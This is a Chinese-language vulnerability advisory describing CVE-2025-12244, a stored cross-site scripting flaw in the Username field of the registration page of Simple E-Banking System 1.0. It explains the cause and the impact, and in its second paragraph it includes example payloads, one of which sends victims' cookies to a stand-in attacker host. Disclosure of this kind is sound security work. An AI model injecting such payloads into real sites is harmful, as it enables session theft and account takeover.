CVE-2025-12244CVE-2025-12244是存在于code-projects开源项目Simple E-Banking System 1.0版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞位于Web应用的注册功能模块,具体涉及/eBank/register.php文件中的Username参数。攻击者可以通过在用户注册时在用户名字段中注入恶意JavaScript脚本,当其他用户访问相关页面或触发特定功能时,恶意脚本将在受害者浏览器中执行,从而窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或执行其他恶意操作。由于该漏洞影响金融系统,攻击者可能利用此漏洞获取用户敏感金融信息,对用户和企业造成严重安全威胁。该漏洞已被公开披露且可被远程利用,无需高权限即可发起攻击。
该漏洞为存储型XSS(Stored XSS)漏洞,存在于Simple E-Banking System 1.0的注册功能中。攻击者通过向/eBank/register.php的Username参数注入恶意JavaScript代码,如<script>alert(document.cookie)</script>或<img src=x onerror=this.src='https://attacker.com/?c='+document.cookie>等Payload。由于应用程序未对用户输入进行充分的输入验证和输出编码,恶意脚本被存储在数据库中。当其他用户访问显示用户名的页面时,浏览器会解析并执行存储的恶意脚本。攻击者可利用此漏洞窃取用户会话令牌、修改页面内容、进行中间人攻击或传播恶意软件。在金融系统中,攻击者可能通过获取管理员凭证进一步入侵系统核心数据库。